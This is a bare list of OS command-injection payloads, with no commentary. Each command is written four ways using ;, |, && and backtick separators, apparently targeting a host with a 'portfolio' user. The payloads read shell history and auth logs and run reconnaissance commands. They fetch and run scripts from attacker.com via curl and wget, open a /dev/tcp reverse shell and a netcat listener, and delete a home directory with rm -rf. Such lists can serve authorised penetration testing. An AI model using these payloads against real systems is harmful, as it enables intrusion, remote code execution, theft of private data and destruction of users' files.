; ls
| ls
&& ls
`ls`
; cat /home/portfolio/.bash_history
| cat /home/portfolio/.bash_history
&& cat /home/portfolio/.bash_history
`cat /home/portfolio/.bash_history`
; id
| id
&& id
`id`
; whoami
| whoami
&& whoami
`whoami`
; ping -c 4 127.0.0.1
| ping -c 4 127.0.0.1
&& ping -c 4 127.0.0.1
`ping -c 4 127.0.0.1`
; uname -a
| uname -a
&& uname -a
`uname -a`
; nc -lvp 1234
| nc -lvp 1234
&& nc -lvp 1234
`nc -lvp 1234`
; curl http://attacker.com/evil_script.sh | sh
| curl http://attacker.com/evil_script.sh | sh
&& curl http://attacker.com/evil_script.sh | sh
`curl http://attacker.com/evil_script.sh | sh`
; wget http://attacker.com/evil_script.sh -O /tmp/evil_script.sh; sh /tmp/evil_script.sh
| wget http://attacker.com/evil_script.sh -O /tmp/evil_script.sh; sh /tmp/evil_script.sh
&& wget http://attacker.com/evil_script.sh -O /tmp/evil_script.sh; sh /tmp/evil_script.sh
`wget http://attacker.com/evil_script.sh -O /tmp/evil_script.sh; sh /tmp/evil_script.sh`
; echo "malicious_code" > /tmp/malicious.sh; sh /tmp/malicious.sh
| echo "malicious_code" > /tmp/malicious.sh; sh /tmp/malicious.sh
&& echo "malicious_code" > /tmp/malicious.sh; sh /tmp/malicious.sh
`echo "malicious_code" > /tmp/malicious.sh; sh /tmp/malicious.sh`
; bash -i >& /dev/tcp/attacker.com/1234 0>&1
| bash -i >& /dev/tcp/attacker.com/1234 0>&1
&& bash -i >& /dev/tcp/attacker.com/1234 0>&1
`bash -i >& /dev/tcp/attacker.com/1234 0>&1`
; rm -rf /home/portfolio/*
| rm -rf /home/portfolio/*
&& rm -rf /home/portfolio/*
`rm -rf /home/portfolio/*`
; cat /var/log/auth.log
| cat /var/log/auth.log
